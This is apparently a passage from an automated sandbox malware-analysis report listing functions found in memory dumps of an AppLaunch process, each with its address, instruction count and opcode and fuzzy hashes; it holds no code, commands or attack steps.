                                                                                                                                                                          • Opcode ID: 8c51c1cd40bc24f9670bc4e60103bd252224faeee44139d8f0e05d3df88fef2c
                                                                                                                                                                          • Instruction ID: 06dd1aeeefacbccd7c575a73c5ffcd724d46b17d55ecbc5150b40262fcc66c2c
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c51c1cd40bc24f9670bc4e60103bd252224faeee44139d8f0e05d3df88fef2c
                                                                                                                                                                          • Instruction Fuzzy Hash: B041DF74E052089FDB08DFA4E8986EDBFB2FF89301F50846AE515A7380DB755982CF54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A319F70 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: H_%
                                                                                                                                                                          • API String ID: 0-270729146
                                                                                                                                                                          • Opcode ID: cd1a762c6052d8dd6bc4dcbb3236016ac1b7c862704c297a4dc929d1826c8db9
                                                                                                                                                                          • Instruction ID: cbfbc36c5d2a5a2ba59f7167c8001c16193d339abf368422dba195fa0dca1a95
                                                                                                                                                                          • Opcode Fuzzy Hash: cd1a762c6052d8dd6bc4dcbb3236016ac1b7c862704c297a4dc929d1826c8db9
                                                                                                                                                                          • Instruction Fuzzy Hash: F841C274E012089FDB18DFA4E4546EDBBB2FF89301F50442AE515B7380DB755942CF54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A318B78 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: x\%
                                                                                                                                                                          • API String ID: 0-3796875586
                                                                                                                                                                          • Opcode ID: 2a4a350a94c937986b7b90714331144a7450cd8f1168ac3a01f39f61f1f39043
                                                                                                                                                                          • Instruction ID: 2edf213eca7e0857667a547f7399b5d4fddbe9b3db0b6f25eafad1a0dccdabbe
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a4a350a94c937986b7b90714331144a7450cd8f1168ac3a01f39f61f1f39043
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D41FF75D12218DFCB08DFA4E4886EEBBB1BF48305F50442AE411B3390CB355A85CF94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A319749 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: H
                                                                                                                                                                          • API String ID: 0-2913464532
                                                                                                                                                                          • Opcode ID: a7ebba5547b9b3bd96ccd5525daa0d99d844ad82f3f0ad6af94a840b764fbd6c
                                                                                                                                                                          • Instruction ID: c3892fb91e66c5406a59804a0a5bf3c8c0f97ee87b643c63da014ec06987df1e
                                                                                                                                                                          • Opcode Fuzzy Hash: a7ebba5547b9b3bd96ccd5525daa0d99d844ad82f3f0ad6af94a840b764fbd6c
                                                                                                                                                                          • Instruction Fuzzy Hash: 69012834D142288FDF08CFA9E4586EDBBF5EB8D311F00856AE805B3380DB7459458BA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A316E38 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: pY%
                                                                                                                                                                          • API String ID: 0-556815174
                                                                                                                                                                          • Opcode ID: 3436a384c01d256a074d0114720877430817daa5d94430a44fa1b67231a4acaf
                                                                                                                                                                          • Instruction ID: ac6bf51997b0f57b53a1856948ed4d13bf0a7715bef46017d7239584bcb3eef6
                                                                                                                                                                          • Opcode Fuzzy Hash: 3436a384c01d256a074d0114720877430817daa5d94430a44fa1b67231a4acaf
                                                                                                                                                                          • Instruction Fuzzy Hash: CBE04630A1A208EBDB00EFB4E65AA9DBBB8FB45218F8049A9D505D3250DB752E009B95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB0CE8 Relevance: .6, Instructions: 616COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a237875c80a65ccb6df59eed6925a296be4700ab5654982f2d5cacad969a462a
                                                                                                                                                                          • Instruction ID: 0cd664c3d9546aa62d8ca55b5be414652524dcbaebd5beb0d14401c654b70f4a
                                                                                                                                                                          • Opcode Fuzzy Hash: a237875c80a65ccb6df59eed6925a296be4700ab5654982f2d5cacad969a462a
                                                                                                                                                                          • Instruction Fuzzy Hash: 5C22A3307042459FDB15DBA8C460EBFBBA6EF89314F1580A9E6068B7E5DBB0DC41CB52
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB3790 Relevance: .6, Instructions: 559COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ab82e9945a387f3fdb892d081a61502faec7fd5d10216d20d2523eb92c105de9
                                                                                                                                                                          • Instruction ID: 78ae71b5ff28a23936c19c34f64c56c4ed2ca2456a6b1592afeb79e812a15e81
                                                                                                                                                                          • Opcode Fuzzy Hash: ab82e9945a387f3fdb892d081a61502faec7fd5d10216d20d2523eb92c105de9
                                                                                                                                                                          • Instruction Fuzzy Hash: FA222875B001089FCB04DFA9C994EAEBBF6EF88704B158099E606DB3A5DB71EC45CB50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCF7D3 Relevance: .4, Instructions: 353COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5a401d118e4912c30a49a7aa1e00e0a38164dc6ffa6ab80c0ce41d9a33fd5c1c
                                                                                                                                                                          • Instruction ID: 11021b6b94b9560b20e416d965f8be72d626e5f991bcba0368fcb6c185fc1908
                                                                                                                                                                          • Opcode Fuzzy Hash: 5a401d118e4912c30a49a7aa1e00e0a38164dc6ffa6ab80c0ce41d9a33fd5c1c
                                                                                                                                                                          • Instruction Fuzzy Hash: 01E12774E01205DFDB14DFA4E098AADBBB2EF44314F51886CE416AF3A5DB74AD86CB40
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB0002 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9b4d81916481216a6aa0445aecc7dce033ac93d025c4e3c1b3da465b8eabac0e
                                                                                                                                                                          • Instruction ID: 150aebc4f13ed39934b514644d2bd7c686e50f612c61ce1f6bd29167f15a8943
                                                                                                                                                                          • Opcode Fuzzy Hash: 9b4d81916481216a6aa0445aecc7dce033ac93d025c4e3c1b3da465b8eabac0e
                                                                                                                                                                          • Instruction Fuzzy Hash: 67D1B1347053048FDB009B64C995BBA7BB6EF99714F0680AAE6069F3E5CBB5DC40CB52
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB06BA Relevance: .3, Instructions: 305COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 34068276ef04e374d6472eef88b79ca8f1d58024fc472cb9289b5738a4c72eb6
                                                                                                                                                                          • Instruction ID: 623b3d513f3ed9fcc9304758828d3b0db2fe7f387fb9e20ab90df54b68e12640
                                                                                                                                                                          • Opcode Fuzzy Hash: 34068276ef04e374d6472eef88b79ca8f1d58024fc472cb9289b5738a4c72eb6
                                                                                                                                                                          • Instruction Fuzzy Hash: 4AB1AF347002048FDB009B64C995FBE7AA7EF98714F0680A9E6069F7E5CBB5EC40CB46
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB05CC Relevance: .3, Instructions: 305COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 17791ea7c5456c870f5e0ff3bd65f080e1386037575317c3649e46d03f79cbdc
                                                                                                                                                                          • Instruction ID: 09ec004c4e5e1259ad59b11172eddaebcef321d7a5715a0071fa1637babbe7ac
                                                                                                                                                                          • Opcode Fuzzy Hash: 17791ea7c5456c870f5e0ff3bd65f080e1386037575317c3649e46d03f79cbdc
                                                                                                                                                                          • Instruction Fuzzy Hash: 45B19F347102048FDB009B64D995FBE7AA7EF98714F0680A9E6069F7E5CBB5EC40CB46
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB0643 Relevance: .3, Instructions: 305COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4220c4e09a58138eea38b2ea6cbff907f7f54d937aada9d487c8febcf4ea175c
                                                                                                                                                                          • Instruction ID: 5dbca750464215eeb61cc4e86fcd9464515f47dd499a3bc9f4ac6490556df2a6
                                                                                                                                                                          • Opcode Fuzzy Hash: 4220c4e09a58138eea38b2ea6cbff907f7f54d937aada9d487c8febcf4ea175c
                                                                                                                                                                          • Instruction Fuzzy Hash: 2FB1AF347002048FDB009B64C995FBE7AA7EF98714F0680A9E6069F7E5CBB5EC40CB46
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB0555 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3def72262f6b48126989e3e762d5b74861132138da7f8abe2f2f69a9f23a120c
                                                                                                                                                                          • Instruction ID: a905467a7106dc4da8e342eb002db32b3aaef6bb3fa34499dd259af3619da4dd
                                                                                                                                                                          • Opcode Fuzzy Hash: 3def72262f6b48126989e3e762d5b74861132138da7f8abe2f2f69a9f23a120c
                                                                                                                                                                          • Instruction Fuzzy Hash: F1B1AF347102048FDB049B64C995FBE7AA7EF98704F0680A9E6069F7E5CBB5EC40CB46
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A318E40 Relevance: .3, Instructions: 285COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6367be78806d1b2187da2ada593514025cfaff334ef8e8aaa2d3030e4fdb49b4
                                                                                                                                                                          • Instruction ID: 2acd4a408f37ca2c77a00e6b83767a33e699aab9374876b6d913b1432de70c13
                                                                                                                                                                          • Opcode Fuzzy Hash: 6367be78806d1b2187da2ada593514025cfaff334ef8e8aaa2d3030e4fdb49b4
                                                                                                                                                                          • Instruction Fuzzy Hash: D5C1F474E01218CFDB58DFA4C894A9DBBB2FF89304F1085A9D419AB761DB309D86CF91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A31AFA0 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b608e641e23a00026a139d4f93018ce91ed9d45db2b85c57d7b7f6bd28057818
                                                                                                                                                                          • Instruction ID: aab2694760291a67793045e933113df7ffd2e4e15c629c75b4eaee386745ebbe
                                                                                                                                                                          • Opcode Fuzzy Hash: b608e641e23a00026a139d4f93018ce91ed9d45db2b85c57d7b7f6bd28057818
                                                                                                                                                                          • Instruction Fuzzy Hash: C7615A31A083848FCB19CF75D88418EFFB1EFC6220B1986ABD154DB692D774D805CBA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCFDC8 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a09bf1fe2e476cc3c17f430b560e8dd40f639bc7a6c07ef1315e02f8922eeb87
                                                                                                                                                                          • Instruction ID: 113899296cbdae21c3d37b8f8130d703cff8929b4fc678b66c8fb65e88d28a51
                                                                                                                                                                          • Opcode Fuzzy Hash: a09bf1fe2e476cc3c17f430b560e8dd40f639bc7a6c07ef1315e02f8922eeb87
                                                                                                                                                                          • Instruction Fuzzy Hash: 3651F070B05340AFDB159B74A456AAE7BB79FC9304F10846DD486CB782DF399C46CB81
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCF621 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9eb6f5ce6c92763ebe06d1e4d06bebd34cb8f7d6212dcd500cdc158f9a508953
                                                                                                                                                                          • Instruction ID: af0c5f7282818f4f1dc4825d930c64bb6efcfd1eae82ba65d67ac8444929d0ed
                                                                                                                                                                          • Opcode Fuzzy Hash: 9eb6f5ce6c92763ebe06d1e4d06bebd34cb8f7d6212dcd500cdc158f9a508953
                                                                                                                                                                          • Instruction Fuzzy Hash: 1F61F9B4E02209DFDB14DFA5D499AADBFF2FF48300F14446DE406AB295DB70A985CB50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB35C2 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 81edd19a754994aaff5df0dc3cf7e7c311814b678d63291692b08e8db808720b
                                                                                                                                                                          • Instruction ID: d003266280bf2a6cc634b74c804fa209fead88907336abb911b3ee2b60be680a
                                                                                                                                                                          • Opcode Fuzzy Hash: 81edd19a754994aaff5df0dc3cf7e7c311814b678d63291692b08e8db808720b
                                                                                                                                                                          • Instruction Fuzzy Hash: B8515E35A152189FCB04CF69D884DEEBBB1FF89314B1580A6E905EB362DB71EC05CB50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB3430 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5dfd708e4609abb3a5c1f598cdf4449c657aba2d91699e75cab5752aaa5b344e
                                                                                                                                                                          • Instruction ID: 85ae43346b437b0f3752627f0373fe28bfbecc0b671811aa214d17effc4587c6
                                                                                                                                                                          • Opcode Fuzzy Hash: 5dfd708e4609abb3a5c1f598cdf4449c657aba2d91699e75cab5752aaa5b344e
                                                                                                                                                                          • Instruction Fuzzy Hash: FE514635B115189FCB14CF69C884DAEBBF2EF88714B1580A9F905AB3A1DB71EC45CB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB11E8 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f93704d6d5b23e93390522c1422567cebd03e5d989610e1315136faea632cfcf
                                                                                                                                                                          • Instruction ID: fd8a34b488473b8906037ac07ca446812a589e56398704e416c0dddfe95617ad
                                                                                                                                                                          • Opcode Fuzzy Hash: f93704d6d5b23e93390522c1422567cebd03e5d989610e1315136faea632cfcf
                                                                                                                                                                          • Instruction Fuzzy Hash: 2441D5347842059FDB109AA8D460FBF7A96DF89718F158469E702DF3E2CEB4DC018752
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCFBD8 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ac9037ede2b675e0626195036a9d040eed60c6cfdbcddeb523c0e9446d8dca2c
                                                                                                                                                                          • Instruction ID: 2626761abdd38f1ab5ec44ab7b9cc0657f08513414f341ce8cd48a2e1e1f40c8
                                                                                                                                                                          • Opcode Fuzzy Hash: ac9037ede2b675e0626195036a9d040eed60c6cfdbcddeb523c0e9446d8dca2c
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A510CB4E12205DFDB14DFA4E599AADBFB2FF48300F14802DE406AF2A5DB74A945CB50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB3E00 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d6f0fef7d3091dae16efb27aa1fa6fe417a70c2e97884225f2c8895da76b585e
                                                                                                                                                                          • Instruction ID: be29b48fe5d20b83a3dcf88284ad4ce3e93cab5861582d477f2ad520b7ac10c5
                                                                                                                                                                          • Opcode Fuzzy Hash: d6f0fef7d3091dae16efb27aa1fa6fe417a70c2e97884225f2c8895da76b585e
                                                                                                                                                                          • Instruction Fuzzy Hash: 3341F474B011149FDB04DF69C899DAEBBF6FF88720B154069E506EB3A1DA71ED40CBA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCE48C Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9e6bc055a551aaa3715ebfdce1b92d8f8993a81643171528d83a87f0862648cf
                                                                                                                                                                          • Instruction ID: 7a4619fd01033202f4e5100357d0f20e788d52d025e21427f6af9a0617b8339c
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e6bc055a551aaa3715ebfdce1b92d8f8993a81643171528d83a87f0862648cf
                                                                                                                                                                          • Instruction Fuzzy Hash: BF313434B097805FC70ADB74A46566EBBA7AFCA305B14846ED44AC7786DF38DD028782
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A318B67 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 62d7df8f7fa0285a96db45a474df0b7c325ec4f65a992ce75d2240345eb346d6
                                                                                                                                                                          • Instruction ID: 07f724dadf4a425ca927356ae602442042380cb7a08e5bfdf37d67afc3ec1cd2
                                                                                                                                                                          • Opcode Fuzzy Hash: 62d7df8f7fa0285a96db45a474df0b7c325ec4f65a992ce75d2240345eb346d6
                                                                                                                                                                          • Instruction Fuzzy Hash: A4413075D12218DFCB08DFA4D4986EEBFB1BF49301F50446AE411B3290DB395A86CF94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A3160D0 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 176ecb139b4379117300aafb5d2b4f7a7c90c5812b6082468334802c353fc25f
                                                                                                                                                                          • Instruction ID: 00d1ac256071a94af84e15c69b455168d66e7a33596c77d971cdd4efaf3653b8
                                                                                                                                                                          • Opcode Fuzzy Hash: 176ecb139b4379117300aafb5d2b4f7a7c90c5812b6082468334802c353fc25f
